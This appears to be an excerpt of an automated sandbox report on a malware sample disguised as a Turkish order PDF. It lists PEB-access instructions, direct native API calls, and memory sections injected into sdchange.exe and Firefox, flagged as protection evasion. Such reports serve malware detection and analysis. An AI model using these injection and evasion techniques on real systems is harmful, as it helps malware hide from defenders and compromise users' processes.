            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6C6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2D6AA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2D6AA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4C640 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D62674 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF866E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF866E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6A660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6A660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D69660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D69660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D33616 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D33616 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D61607 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DAE609 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6F603 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E05636 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4E627 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D66620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D68620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3262C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3C7C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D357C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D357C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D357C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D347FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D347FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3D7E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEF78A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E037B6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5D7B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB97A9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DBF7AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DBF7AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DBF7AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DBF7AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DBF7AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D307AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D30750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB4755 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D43740 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D43740 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D43740 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6674D mov esi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D38770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E03749 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2B765 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2B765 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2B765 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2B765 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D30710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D60710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6F71F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6F71F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D37703 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D35702 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D35702 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6C700 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E0B73C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E0B73C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E0B73C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E0B73C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D29730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D29730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D65734 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3973A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3973A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6273C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DAC730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEF72E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D33720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4F720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4F720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4F720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF972B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D304E5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E054DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DD94E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2B480 mov eax, dword ptr fs:[00000030h]

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: NULL target: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: NULL target: C:\Windows\SysWOW64\sdchange.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe protection: read write
            Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sdchange.exe Thread register set: target process: 4108
            Source: C:\Windows\SysWOW64\sdchange.exe Thread APC queued: target process: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Process created: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
